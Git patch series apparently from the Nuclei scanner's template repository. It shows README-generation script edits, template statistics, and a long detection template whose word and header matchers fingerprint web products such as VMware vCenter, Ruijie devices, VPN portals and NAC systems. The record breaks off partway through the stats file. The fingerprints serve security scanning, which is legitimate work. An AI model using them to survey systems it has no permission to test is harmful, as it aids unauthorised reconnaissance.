    - -{get_top10()} - - 📖 Documentation ----- diff --git a/.github/scripts/update-readme.py b/.github/scripts/update-readme.py index 814459587f..d585617477 100644 --- a/.github/scripts/update-readme.py +++ b/.github/scripts/update-readme.py @@ -9,7 +9,7 @@ def command(args, start=None, end=None): return "\n".join(subprocess.run(args, text=True, capture_output=True).stdout.split("\n")[start:end])[:-1] def get_top10(): - HEADER = "## Top 10 Contributors\n\n" + HEADER = "## Nuclei Templates Top 10 statistics\n\n" TOP10 = command(["cat", "TOP-10.md"]) return HEADER + TOP10 if len(TOP10) > 0 else "" From 9b1a9aaf25b7adc247cf41b53b221effdcbc95d3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 20 Jul 2021 13:03:55 +0000 Subject: [PATCH 0948/4083] Auto Update README [Tue Jul 20 13:03:55 UTC 2021] :robot: --- README.md | 26 +++++++++++--------------- 1 file changed, 11 insertions(+), 15 deletions(-) diff --git a/README.md b/README.md index 6d946b7ac1..7a9a0a09d3 100644 --- a/README.md +++ b/README.md @@ -32,28 +32,19 @@ We hope that you also contribute by sending templates via **pull requests** or [ ## Nuclei Templates overview -An overview of the nuclei template directory including number of templates associated with each directory. +An overview of the nuclei template project, including statistics on unique tags, author, directory, severity, and type of templates. The table below contains the top ten statistics for each matrix; an expanded version of this is [available here](TEMPLATES-STATS.md), and also available in [JSON](TEMPLATES-STATS.json) format for integration. + +
    -| Templates | Counts | Templates | Counts | Templates | Counts | -| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 475 | vulnerabilities | 229 | exposed-panels | 202 | -| takeovers | 70 | exposures | 116 | technologies | 125 | -| misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | -| default-logins | 44 | file | 42 | dns | 10 | -| fuzzing | 10 | helpers | 9 | iot | 18 | +## Nuclei Templates Top 10 statistics -**134 directories, 1609 files**. + + + - -
    -
    - - -## Top 10 Contributors +## Nuclei Templates Top 10 statistics | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| @@ -68,6 +59,11 @@ An overview of the nuclei template directory including number of templates assoc | wp-plugin | 110 | gaurang | 42 | file | 42 | | | | | | cve2019 | 82 | gy741 | 36 | workflows | 33 | | | | | +**134 directories, 1612 files**. + +
    📖 Documentation ----- From 76259204a7cc5aa2e0ecc33068d71c2dffa747a3 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 18:35:07 +0530 Subject: [PATCH 0949/4083] Update README.tmpl --- .github/scripts/README.tmpl | 6 ------ 1 file changed, 6 deletions(-) diff --git a/.github/scripts/README.tmpl b/.github/scripts/README.tmpl index 5f0f630645..0379c746d5 100644 --- a/.github/scripts/README.tmpl +++ b/.github/scripts/README.tmpl @@ -38,12 +38,6 @@ An overview of the nuclei template project, including statistics on unique tags,
    -## Nuclei Templates Top 10 statistics - - - - + + - type: word + condition: and + name: redmine + words: + - authenticity_token + - redmine + + - type: word + condition: and + name: redmine + words: + - content="redmine + + - type: word + condition: and + name: redmine + words: + - powered by + + - type: word + condition: and + name: redwoodhq + words: + - stylesheets/redwoodtheme/resources/js/azzurra.js + + - type: word + condition: and + name: remobjects-dxsock + words: + - content="remobjects sdk + + - type: word + condition: and + name: remobjects-dxsock + words: + - remobjects software, llc. + + - type: word + condition: and + name: remotelyanywhere + words: + - /img/ralogo.png" alt="remotelyanywhere + + - type: word + condition: and + part: header + name: remotelyanywhere + words: + - 'Server: remotelyanywhere' + + - type: word + condition: and + name: renwoxing-crm + words: + - /resources/imgs/defaultannex/loginpictures/ + + - type: word + condition: and + name: reremouse-exam-system + words: + - 蝙蝠在线考试系统 + + - type: word + condition: and + name: reremouse-exam-system + words: + - 博库医学在线考试系统,技术支持:杭州博库科技有限公司 + + - type: word + condition: and + name: reremouse-exam-system + words: + - src="/resources/js/upscroll.js" + + - type: word + condition: and + name: resourcemanager + words: + - this is standby rm. redirecting to the current active rm + + - type: word + condition: and + name: reviewboard + words: + - /static/rb/images/delete + + - type: word + condition: and + name: richinfo-richmail + words: + - content="richmail + - richmail + + - type: word + condition: and + name: rising-antivirus-online + words: + - src="ravweb_files/ + + - type: word + condition: and + name: rising-antivirus-wall + words: + - action="/index.php" onsubmit="return checkfrm(this); + + - type: word + condition: and + name: riverbed-appresponse + words: + - uiwebinsights/webinsights.html + + - type: word + condition: and + name: rmihttpserver + words: + - cloudclient httpserver is running... + + - type: word + condition: and + name: rockoa-oa + words: + - onclick="loginsubmit()" + + - type: word + condition: and + name: rockoa-oa + words: + - 信呼开发团队 + + - type: word + condition: and + name: rockoa-oa + words: + - 技术支持:锐捷网络 + + - type: word + condition: and + name: ruijie-it + words: + - var logincookiename = 'riil_id' + + - type: word + condition: and + name: ruijie-rg-uac + words: + - bbs.ruijie.com.cn + - 锐捷统一上网行为管理与审计系统 + + - type: word + condition: and + name: ruijie-rg-uac + words: + - src='images/free_login.png' + + - type: word + condition: and + part: header + name: ruijie-rgos + words: + - 'Server: rgos http-server' + + - type: word + condition: and + name: ruijie-router-nbr + words: + - web_monitor_config.htm + - 锐捷网络 + + - type: word + condition: and + name: ruijie-smart-web + words: + - 无线smartWeb + + - type: word + condition: and + name: ruijie-sslvpn + words: + - document.cookie = "rjsslvpn_encookie=yes;" + + - type: word + condition: and + name: ruijie-sslvpn + words: + - SSLVPN + - login + - rjsslvpn_encookie + + - type: word + condition: and + name: runda-supervisory-platform + words: + - class="log_rbox" + + - type: word + condition: and + name: ruoyi-system + words: + - /ry-ui.css + - /ry-ui.js + + - type: word + condition: and + name: rusong-product + words: + - plugins/wbb/barrett.js + + - type: word + condition: and + name: ruvar-oa + words: + - + + - type: word + condition: and + name: veritas-netbackup + words: + - href="/opscenter/features/common/images/favicon.ico" + + - type: word + condition: and + name: vertiv-system + words: + - var port = "9528 + + - type: word + condition: and + part: header + name: vertx + words: + - 'Set-Cookie: vertx-web.session' + + - type: word + condition: and + name: vhsoft-vhplot + words: + - /vhplot/webresource.axd + + - type: word + condition: and + name: vicidial + words: + - url=/vicidial/welcome.php + + - type: word + condition: and + name: victorysoft + words: + - value="style2012/style1/scripts/expressinstall.swf" + + - type: word + condition: and + name: victorysoft + words: + - href="webstyles/webstyle1/style1/css.css" + + - type: word + condition: and + name: victorysoft-performance-management-system + words: + - class="row fl-controls-left + + - type: word + condition: and + name: victorysoft-performance-management-system + words: + - casui/themes/siam/login.css + + - type: word + condition: and + name: videosoon + words: + - power by linksoon - videosoon + + - type: word + condition: and + name: videosoon + words: + - href="skin/anysoondefault/anystyles.css + + - type: word + condition: and + name: videosurveillancemanagementplatform + words: + - ' 平台采用最新图像化展现技术' + + - type: word + condition: and + name: viewgood-streammedia + words: + - fgetquery + + - type: word + condition: and + name: viewgood-streammedia + words: + - viewgood + + - type: word + condition: and + name: viewgood-streammedia + words: + - location.href + - var webvirtualdiretory = 'viewgood'; + + - type: word + condition: and + name: viewgood-streammedia + words: + - src='/viewgood/pc/ + + - type: word + condition: and + name: violation-outreach-monitoring-system + words: + - + + - type: word + condition: and + name: violation-outreach-monitoring-system + words: + - window.location='login.action'; + + - type: word + condition: and + name: violation-outreach-monitoring-system + words: + - 欢迎登录违规外联平台 + + - type: word + condition: and + name: virtualmin + words: + -
    forgot your virtualmin password?
    + + - type: word + condition: and + name: visualware-myconnection-server + words: + - + + - type: word + condition: and + name: vmedia-multimedia-publishing-platform + words: + - function toggle(targetid) + + - type: word + condition: and + name: vmedia-multimedia-publishing-platform + words: + - class="video_00" + + - type: word + condition: and + name: vmware-esx + words: + - content="vmware esxi + + - type: word + condition: and + name: vmware-esx + words: + - document.write("" + id_eesx_welcome + ""); + + - type: word + condition: and + name: vmware-esx + words: + - + + - type: word + condition: and + name: vmware-esx + words: + - 'content="vmware esx ' + + - type: word + condition: and + name: vmware-esx + words: + - document.write(id_esx_viclientdesc); + + - type: word + condition: and + name: vmware-esxi + words: + - ng-app="esxuiapp" + + - type: word + condition: and + name: vmware-esxi + words: + - + + - type: word + condition: and + name: vmware-horizon + words: + - href='https://www.vmware.com/go/viewclients' + + - type: word + condition: and + name: vmware-horizon + words: + - alt="vmware horizon"> + + - type: word + condition: and + name: vmware-server-2 + words: + - content="vmware server is virtual + + - type: word + condition: and + name: vmware-vcenter + words: + - /converter/vmware-converter-client.exe + + - type: word + condition: and + name: vmware-vcenter + words: + - content="vmware vcenter + + - type: word + condition: and + name: vmware-vcenter + words: + - /vmw_nsx_logo-black-triangle-500w.png + + - type: word + condition: and + name: vmware-virtualcenter + words: + - content="vmware virtualcenter + + - type: word + condition: and + name: vmware-virtualcenter + words: + - content="vmware vsphere + + - type: word + condition: and + name: vmware-virtualcenter + words: + - url=vcops-vsphere/ + + - type: word + condition: and + name: vmware-virtualcenter + words: + - the vshield manager requires + + - type: word + condition: and + name: vmware-vrealize + words: + - 正在重定向到 vrealize operations manager web + + - type: word + condition: and + name: vmware-vrealize-operations-manager + words: + - Identity Manager + - VMware + + - type: word + condition: and + name: vmware-vsphere + words: + - <meta name="description" content="VMware vSphere + + - type: word + condition: and + name: vmwareview + words: + - <title>VMware View Portal + + - type: word + condition: and + name: vnc + words: + - 微信数字投票 + - content="微平台投票管理系统 + + - type: word + condition: and + name: vp-asp + words: + - + + - type: word + condition: and + name: vp-asp + words: + - src="vs350.js + + - type: word + condition: and + name: vp-asp + words: + - shopdisplayproducts.asp?id= + + - type: word + condition: and + name: vpn358system + words: + - class="form-actions j_add_ip_actions" + + - type: word + condition: and + name: vpn358system + words: + - href="/lib/bootstrap/ico/favicon.ico" + + - type: word + condition: and + name: vrv-desktop-application-system + words: + - vrv + + - type: word + condition: and + name: vrv-desktop-application-system + words: + - var vver = $('#hidverify').val(); + + - type: word + condition: and + name: vrv-im + words: + -

    连豆豆pc客户端

    + + - type: word + condition: and + name: vrv-im + words: + - href="http://im.vrv.cn/server-securitycenter/password/goretrieval.vrv + + - type: word + condition: and + name: vrv-im + words: + - class="loginusername" value="" placeholder="连豆豆账号/邮箱/手机号 + + - type: word + condition: and + name: vrv-im + words: + - class="wj-text wj-title">下载信源豆豆

    + + - type: word + condition: and + name: vrv-nac + words: + - id="modal_delay" + + - type: word + condition: and + name: vrv-nac + words: + - localstorage.setitem('doctitle','北信源网络接入控制系统') + - 欢迎登录北信源网络接入控制系统 + + - type: word + condition: and + name: vts-cms + words: + - errmag + + - type: word + condition: and + name: w3-total-cache + words: + - ' + + - type: word + condition: and + name: websvn + words: + - WebSVN + - subversion + + - type: word + condition: and + name: webtrust-cert + words: + - https://cert.webtrust.org/viewseal + + - type: word + condition: and + name: weiphp + words: + - 本系统由
    weiphp强力驱动 + + - type: word + condition: and + name: weiphp + words: + - content="weiphp + + - type: word + condition: and + name: weiphp + words: + - /css/weiphp.css + + - type: word + condition: and + name: weisha-learningsystem + words: + - /utility/corescripts/widget.js + + - type: word + condition: and + name: wellcare-health-management-system + words: + - href="/web/vfyphrmedical">健康档案 + + - type: word + condition: and + name: wellcare-health-management-system + words: + - www.wellcare.cn + + - type: word + condition: and + part: header + name: weonlydo-product + words: + - 'Server: weonlydo' + + - type: word + condition: and + part: header + name: westell-secure + words: + - 'Server: wstl cpe' + + - type: word + condition: and + name: whatweb + words: + -
    - {get_top10()} **{command("tree", -2, None)}**. From 9c67ac6b4e2c3cb3477511415c74c5a0456ec171 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 20 Jul 2021 13:05:45 +0000 Subject: [PATCH 0950/4083] Auto Update README [Tue Jul 20 13:05:45 UTC 2021] :robot: --- README.md | 6 ------ 1 file changed, 6 deletions(-) diff --git a/README.md b/README.md index 7a9a0a09d3..1c9fb3a946 100644 --- a/README.md +++ b/README.md @@ -40,12 +40,6 @@ An overview of the nuclei template project, including statistics on unique tags, ## Nuclei Templates Top 10 statistics - - - From cfaf79ca27af127740861fae86995395deb49602 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 26 Jul 2021 23:24:14 +0530 Subject: [PATCH 1166/4083] stats update --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1244 ++++++++++++++++++++++-------------------- TOP-10.md | 24 +- 3 files changed, 656 insertions(+), 614 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 89fb334609..614448d12c 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":464},{"name":"panel","count":201},{"name":"xss","count":168},{"name":"wordpress","count":165},{"name":"rce","count":162},{"name":"exposure","count":154},{"name":"cve2020","count":135},{"name":"lfi","count":127},{"name":"wp-plugin","count":110},{"name":"cve2019","count":82},{"name":"config","count":81},{"name":"tech","count":72},{"name":"cve2021","count":71},{"name":"takeover","count":71},{"name":"token","count":63},{"name":"cve2018","count":62},{"name":"apache","count":60},{"name":"default-login","count":45},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":39},{"name":"iot","count":33},{"name":"network","count":32},{"name":"oracle","count":29},{"name":"sqli","count":29},{"name":"workflow","count":28},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":25},{"name":"oob","count":25},{"name":"ssrf","count":25},{"name":"disclosure","count":24},{"name":"logs","count":24},{"name":"redirect","count":20},{"name":"aem","count":18},{"name":"listing","count":15},{"name":"cisco","count":15},{"name":"sap","count":14},{"name":"cve2016","count":14},{"name":"fuzz","count":13},{"name":"debug","count":13},{"name":"struts","count":13},{"name":"cve2015","count":13},{"name":"misconfig","count":13},{"name":"weblogic","count":12},{"name":"android","count":12},{"name":"springboot","count":11},{"name":"dns","count":11},{"name":"zoho","count":11},{"name":"auth-bypass","count":11},{"name":"devops","count":10},{"name":"cve2011","count":10},{"name":"magento","count":9},{"name":"cve2012","count":9},{"name":"dlink","count":9},{"name":"jenkins","count":9},{"name":"ftp","count":8},{"name":"gitlab","count":8},{"name":"airflow","count":8},{"name":"cve2013","count":8},{"name":"adobe","count":8},{"name":"cnvd","count":8},{"name":"php","count":8},{"name":"aws","count":8},{"name":"joomla","count":7},{"name":"scada","count":7},{"name":"vmware","count":7},{"name":"cve2014","count":7},{"name":"rconfig","count":6},{"name":"backup","count":6},{"name":"api","count":6},{"name":"nginx","count":6},{"name":"cms","count":6},{"name":"citrix","count":6},{"name":"google","count":6},{"name":"rails","count":6},{"name":"xxe","count":6},{"name":"login","count":5},{"name":"laravel","count":5},{"name":"confluence","count":5},{"name":"solr","count":5},{"name":"dell","count":5},{"name":"java","count":5},{"name":"circarlife","count":5},{"name":"iis","count":5},{"name":"ssti","count":5},{"name":"lucee","count":5},{"name":"phpmyadmin","count":5},{"name":"ruijie","count":5},{"name":"headless","count":5},{"name":"drupal","count":5},{"name":"jetty","count":5},{"name":"solarwinds","count":4},{"name":"samsung","count":4},{"name":"hongdian","count":4},{"name":"docker","count":4},{"name":"cve2009","count":4},{"name":"artifactory","count":4},{"name":"thinkcmf","count":4},{"name":"traversal","count":4},{"name":"thinkphp","count":4},{"name":"nodejs","count":4},{"name":"router","count":4},{"name":"vpn","count":4},{"name":"asp","count":4},{"name":"django","count":4},{"name":"magmi","count":4},{"name":"webserver","count":4},{"name":"tomcat","count":4},{"name":"elastic","count":4},{"name":"moodle","count":4},{"name":"netgear","count":4},{"name":"jolokia","count":4},{"name":"ibm","count":4},{"name":"fileupload","count":4},{"name":"terramaster","count":3},{"name":"bypass","count":3},{"name":"git","count":3},{"name":"ofbiz","count":3},{"name":"fanruan","count":3},{"name":"printer","count":3},{"name":"lfr","count":3},{"name":"grafana","count":3},{"name":"r-seenet","count":3},{"name":"nacos","count":3},{"name":"fpd","count":3},{"name":"backups","count":3},{"name":"openssh","count":3},{"name":"springcloud","count":3},{"name":"amazon","count":3},{"name":"microstrategy","count":3},{"name":"vbulletin","count":3},{"name":"slack","count":3},{"name":"ebs","count":3},{"name":"dedecms","count":3},{"name":"caucho","count":3},{"name":"kubernetes","count":3},{"name":"mongodb","count":3},{"name":"deserialization","count":3},{"name":"resin","count":3},{"name":"ssh","count":3},{"name":"windows","count":3},{"name":"kafka","count":3},{"name":"log","count":3},{"name":"nosqli","count":3},{"name":"crlf","count":3},{"name":"oa","count":3},{"name":"microsoft","count":2},{"name":"rockmongo","count":2},{"name":"cache","count":2},{"name":"intrusive","count":2},{"name":"globalprotect","count":2},{"name":"jboss","count":2},{"name":"openam","count":2},{"name":"openfire","count":2},{"name":"mail","count":2},{"name":"exposures","count":2},{"name":"pega","count":2},{"name":"fortios","count":2},{"name":"keycloak","count":2},{"name":"proxy","count":2},{"name":"oauth","count":2},{"name":"plesk","count":2},{"name":"xxljob","count":2},{"name":"rockethchat","count":2},{"name":"vrealize","count":2},{"name":"splunk","count":2},{"name":"waf","count":2},{"name":"frp","count":2},{"name":"ucmdb","count":2},{"name":"seeyon","count":2},{"name":"prometheus","count":2},{"name":"webcam","count":2},{"name":"spark","count":2},{"name":"injection","count":2},{"name":"emerge","count":2},{"name":"paloalto","count":2},{"name":"hpe","count":2},{"name":"kentico","count":2},{"name":"rstudio","count":2},{"name":"flir","count":2},{"name":"bigip","count":2},{"name":"natshell","count":2},{"name":"ecology","count":2},{"name":"activemq","count":2},{"name":"hp","count":2},{"name":"nagios","count":2},{"name":"icewarp","count":2},{"name":"maian","count":2},{"name":"coldfusion","count":2},{"name":"smtp","count":2},{"name":"dos","count":2},{"name":"nexus","count":2},{"name":"saltstack","count":2},{"name":"smb","count":2},{"name":"couchdb","count":2},{"name":"odoo","count":2},{"name":"zabbix","count":2},{"name":"httpd","count":2},{"name":"kibana","count":2},{"name":"idrac","count":2},{"name":"leak","count":2},{"name":"telerik","count":2},{"name":"glassfish","count":2},{"name":"strapi","count":2},{"name":"nextjs","count":2},{"name":"sonarqube","count":2},{"name":"sonicwall","count":2},{"name":"voipmonitor","count":2},{"name":"sharepoint","count":2},{"name":"wordfence","count":2},{"name":"zhiyuan","count":2},{"name":"jellyfin","count":2},{"name":"hjtcloud","count":2},{"name":"shellshock","count":2},{"name":"huawei","count":2},{"name":"trixbox","count":2},{"name":"chamilo","count":2},{"name":"bitrix","count":2},{"name":"hashicorp","count":2},{"name":"cve2008","count":2},{"name":"yapi","count":2},{"name":"service","count":2},{"name":"showdoc","count":2},{"name":"mida","count":2},{"name":"email","count":1},{"name":"zimbra","count":1},{"name":"moinmoin","count":1},{"name":"mpsec","count":1},{"name":"upnp","count":1},{"name":"jquery","count":1},{"name":"csod","count":1},{"name":"gateone","count":1},{"name":"etouch","count":1},{"name":"sidekiq","count":1},{"name":"xff","count":1},{"name":"expn","count":1},{"name":"wildfly","count":1},{"name":"openstack","count":1},{"name":"nordex","count":1},{"name":"webmin","count":1},{"name":"trilithic","count":1},{"name":"optiLink","count":1},{"name":"node","count":1},{"name":"robomongo","count":1},{"name":"idemia","count":1},{"name":"spring","count":1},{"name":"pyramid","count":1},{"name":"blackboard","count":1},{"name":"hadoop","count":1},{"name":"pgadmin","count":1},{"name":"favicon","count":1},{"name":"mediumish","count":1},{"name":"payara","count":1},{"name":"interlib","count":1},{"name":"netrc","count":1},{"name":"fedora","count":1},{"name":"floc","count":1},{"name":"maccmsv10","count":1},{"name":"heroku","count":1},{"name":"aspnuke","count":1},{"name":"yachtcontrol","count":1},{"name":"upload","count":1},{"name":"gogs","count":1},{"name":"tpshop","count":1},{"name":"spidercontrol","count":1},{"name":"backdoor","count":1},{"name":"redis","count":1},{"name":"tapestry","count":1},{"name":"jeewms","count":1},{"name":"timeclock","count":1},{"name":"bullwark","count":1},{"name":"ricoh","count":1},{"name":"emby","count":1},{"name":"socomec","count":1},{"name":"realteo","count":1},{"name":"checkpoint","count":1},{"name":"rmc","count":1},{"name":"wuzhicms","count":1},{"name":"ioncube","count":1},{"name":"domxss","count":1},{"name":"timesheet","count":1},{"name":"grails","count":1},{"name":"zend","count":1},{"name":"tongda","count":1},{"name":"hortonworks","count":1},{"name":"panabit","count":1},{"name":"db","count":1},{"name":"doh","count":1},{"name":"csrf","count":1},{"name":"zcms","count":1},{"name":"nps","count":1},{"name":"ilo4","count":1},{"name":"postgres","count":1},{"name":"calendarix","count":1},{"name":"majordomo2","count":1},{"name":"kerbynet","count":1},{"name":"dvr","count":1},{"name":"alertmanager","count":1},{"name":"codeigniter","count":1},{"name":"xml","count":1},{"name":"cobub","count":1},{"name":"starttls","count":1},{"name":"clockwatch","count":1},{"name":"ntopng","count":1},{"name":"traefik","count":1},{"name":"opentsdb","count":1},{"name":"beanshell","count":1},{"name":"cve2010","count":1},{"name":"74cms","count":1},{"name":"tenda","count":1},{"name":"enum","count":1},{"name":"akamai","count":1},{"name":"circontrol","count":1},{"name":"harbor","count":1},{"name":"haproxy","count":1},{"name":"sco","count":1},{"name":"biometrics","count":1},{"name":"ruby","count":1},{"name":"dotnet","count":1},{"name":"ulterius","count":1},{"name":"primetek","count":1},{"name":"pacsone","count":1},{"name":"concrete","count":1},{"name":"faraday","count":1},{"name":"k8","count":1},{"name":"cors","count":1},{"name":"postmessage","count":1},{"name":"woocomernce","count":1},{"name":"dotnetnuke","count":1},{"name":"jnoj","count":1},{"name":"geutebruck","count":1},{"name":"yii","count":1},{"name":"b2evolution","count":1},{"name":"mcafee","count":1},{"name":"seacms","count":1},{"name":"kubeflow","count":1},{"name":"fortigate","count":1},{"name":"jsf","count":1},{"name":"ssltls","count":1},{"name":"bolt","count":1},{"name":"wavemaker","count":1},{"name":"apiman","count":1},{"name":"mailchimp","count":1},{"name":"nedi","count":1},{"name":"plc","count":1},{"name":"sqlite","count":1},{"name":"linkedin","count":1},{"name":"skywalking","count":1},{"name":"razor","count":1},{"name":"cloudflare","count":1},{"name":"emc","count":1},{"name":"ecom","count":1},{"name":"rhymix","count":1},{"name":"drone","count":1},{"name":"dompdf","count":1},{"name":"appweb","count":1},{"name":"nomad","count":1},{"name":"webmodule-ee","count":1},{"name":"esmtp","count":1},{"name":"aura","count":1},{"name":"cse","count":1},{"name":"salesforce","count":1},{"name":"opencast","count":1},{"name":"targa","count":1},{"name":"pulsesecure","count":1},{"name":"jsp","count":1},{"name":"jfrog","count":1},{"name":"jmx","count":1},{"name":"centos","count":1},{"name":"ganglia","count":1},{"name":"wp-theme","count":1},{"name":"monitorr","count":1},{"name":"vsftpd","count":1},{"name":"zmanda","count":1},{"name":"rdp","count":1},{"name":"jenzabar","count":1},{"name":"octobercms","count":1},{"name":"blue-ocean","count":1},{"name":"nuuo","count":1},{"name":"ambari","count":1},{"name":"circontrorl","count":1},{"name":"swagger","count":1},{"name":"cve2005","count":1},{"name":"flash","count":1},{"name":"chinaunicom","count":1},{"name":"node-red-dashboard","count":1},{"name":"jenkin","count":1},{"name":"zenario","count":1},{"name":"extractor","count":1},{"name":"bookstack","count":1},{"name":"tensorflow","count":1},{"name":"fastcgi","count":1},{"name":"dom","count":1},{"name":"monitorix","count":1},{"name":"liferay","count":1},{"name":"netsweeper","count":1},{"name":"acme","count":1},{"name":"status","count":1},{"name":"klog","count":1},{"name":"visionhub","count":1},{"name":"wazuh","count":1},{"name":"firebase","count":1},{"name":"ssl","count":1},{"name":"plugin","count":1},{"name":"javafaces","count":1},{"name":"fiori","count":1},{"name":"springframework","count":1},{"name":"turbocrm","count":1},{"name":"erp-nc","count":1},{"name":"mirai","count":1},{"name":"smartsense","count":1},{"name":"lanproxy","count":1},{"name":"landrayoa","count":1},{"name":"hasura","count":1},{"name":"cgi","count":1},{"name":"opensmtpd","count":1},{"name":"proftpd","count":1},{"name":"st","count":1},{"name":"dvwa","count":1},{"name":"feifeicms","count":1},{"name":"shopware","count":1},{"name":"alerta","count":1},{"name":"eyou","count":1},{"name":"sentry","count":1},{"name":"sarg","count":1},{"name":"mysql","count":1},{"name":"weiphp","count":1},{"name":"kafdrop","count":1},{"name":"phalcon","count":1},{"name":"thinkadmin","count":1},{"name":"adminer","count":1},{"name":"tensorboard","count":1},{"name":"itop","count":1},{"name":"arl","count":1},{"name":"cve2007","count":1},{"name":"zte","count":1},{"name":"ems","count":1},{"name":"webadmin","count":1},{"name":"fuelcms","count":1},{"name":"tileserver","count":1},{"name":"moin","count":1},{"name":"netdata","count":1},{"name":"rfi","count":1},{"name":"totaljs","count":1},{"name":"druid","count":1},{"name":"phpinfo","count":1},{"name":"cocoon","count":1},{"name":"htmli","count":1},{"name":"wamp","count":1},{"name":"stem","count":1},{"name":"mautic","count":1},{"name":"wmt","count":1},{"name":"javamelody","count":1},{"name":"nsasg","count":1},{"name":"pippoint","count":1},{"name":"opensns","count":1},{"name":"openrestry","count":1},{"name":"goahead","count":1},{"name":"soar","count":1},{"name":"ueditor","count":1},{"name":"landray","count":1},{"name":"zarafa","count":1},{"name":"2014","count":1},{"name":"octoprint","count":1},{"name":"lotuscms","count":1},{"name":"gloo","count":1},{"name":"avalanche","count":1},{"name":"xdcms","count":1},{"name":"linksys","count":1},{"name":"clave","count":1},{"name":"nc2","count":1},{"name":"bitly","count":1},{"name":"viewlinc","count":1},{"name":"tika","count":1},{"name":"gitlist","count":1},{"name":"plastic","count":1},{"name":"darkstat","count":1},{"name":"opm","count":1},{"name":"k8s","count":1},{"name":"codemeter","count":1},{"name":"netis","count":1},{"name":"kyan","count":1},{"name":"linkerd","count":1},{"name":"fortilogger","count":1},{"name":"webui","count":1},{"name":"tamronos","count":1},{"name":"spf","count":1},{"name":"cloudinary","count":1},{"name":"zzzcms","count":1},{"name":"shopxo","count":1},{"name":"glances","count":1},{"name":"wiki","count":1},{"name":"webftp","count":1},{"name":"ec2","count":1},{"name":"nexusdb","count":1},{"name":"npm","count":1},{"name":"axis","count":1},{"name":"finereport","count":1},{"name":"parentlink","count":1},{"name":"enumeration","count":1},{"name":"wifisky","count":1},{"name":"szhe","count":1},{"name":"krweb","count":1},{"name":"triconsole","count":1},{"name":"livezilla","count":1},{"name":"selea","count":1},{"name":"svnserve","count":1},{"name":"rabbitmq","count":1},{"name":"rsyncd","count":1},{"name":"synnefo","count":1},{"name":"dlogin","count":1},{"name":"uwsgi","count":1},{"name":"phpunit","count":1},{"name":"empirecms","count":1},{"name":"mongoshake","count":1},{"name":"plone","count":1},{"name":"kong","count":1},{"name":"rubedo","count":1},{"name":"wooyun","count":1},{"name":"flink","count":1},{"name":"comodo","count":1},{"name":"vsphere","count":1},{"name":"panos","count":1},{"name":"azure","count":1},{"name":"wso2","count":1},{"name":"nette","count":1},{"name":"xiuno","count":1},{"name":"anchorcms","count":1},{"name":"svn","count":1},{"name":"zookeeper","count":1},{"name":"redhat","count":1},{"name":"keenetic","count":1},{"name":"saltapi","count":1},{"name":"mdb","count":1},{"name":"acexy","count":1},{"name":"redwood","count":1},{"name":"bash","count":1},{"name":"horde","count":1},{"name":"servicedesk","count":1},{"name":"duomicms","count":1},{"name":"portainer","count":1},{"name":"myucms","count":1},{"name":"setup","count":1},{"name":"gridx","count":1},{"name":"zeroshell","count":1},{"name":"scs","count":1},{"name":"mongo","count":1},{"name":"symfony","count":1},{"name":"varnish","count":1},{"name":"metinfo","count":1},{"name":"embedthis","count":1},{"name":"lansweeper","count":1},{"name":"nuxeo","count":1},{"name":"rmi","count":1},{"name":"grav","count":1},{"name":"xunchi","count":1},{"name":"mara","count":1},{"name":"blind","count":1},{"name":"spectracom","count":1},{"name":"openerp","count":1},{"name":"crm","count":1},{"name":"servicenow","count":1},{"name":"discord","count":1},{"name":"clusterengine","count":1},{"name":"jitsi","count":1},{"name":"exchange","count":1},{"name":"bruteforce","count":1},{"name":"lancom","count":1},{"name":"javascript","count":1},{"name":"vscode","count":1},{"name":"labtech","count":1},{"name":"sitecore","count":1},{"name":"rujjie","count":1},{"name":"sprintful","count":1},{"name":"fortigates","count":1},{"name":"igs","count":1},{"name":"zm","count":1},{"name":"oscommerce","count":1},{"name":"memcached","count":1},{"name":"fortiweb","count":1},{"name":"episerver","count":1},{"name":"huijietong","count":1},{"name":"mobileiron","count":1},{"name":"alibaba","count":1},{"name":"fortinet","count":1},{"name":"diris","count":1},{"name":"mantisbt","count":1},{"name":"viewpoint","count":1},{"name":"geddy","count":1},{"name":"avtech","count":1},{"name":"subrion","count":1},{"name":"fastapi","count":1},{"name":"discourse","count":1},{"name":"powercreator","count":1},{"name":"ns","count":1}],"authors":[{"name":"dhiyaneshdk","count":202},{"name":"pdteam","count":184},{"name":"pikpikcu","count":177},{"name":"dwisiswant0","count":113},{"name":"geeknik","count":88},{"name":"daffainfo","count":79},{"name":"madrobot","count":59},{"name":"princechaddha","count":50},{"name":"gaurang","count":42},{"name":"gy741","count":36},{"name":"ice3man","count":26},{"name":"pussycat0x","count":25},{"name":"0x_akoko","count":20},{"name":"organiccrap","count":19},{"name":"sheikhrishad","count":15},{"name":"techbrunchfr","count":13},{"name":"milo2012","count":13},{"name":"suman_kar","count":12},{"name":"pr3r00t","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"wdahlenb","count":8},{"name":"nadino","count":8},{"name":"hackergautam","count":8},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"techryptic 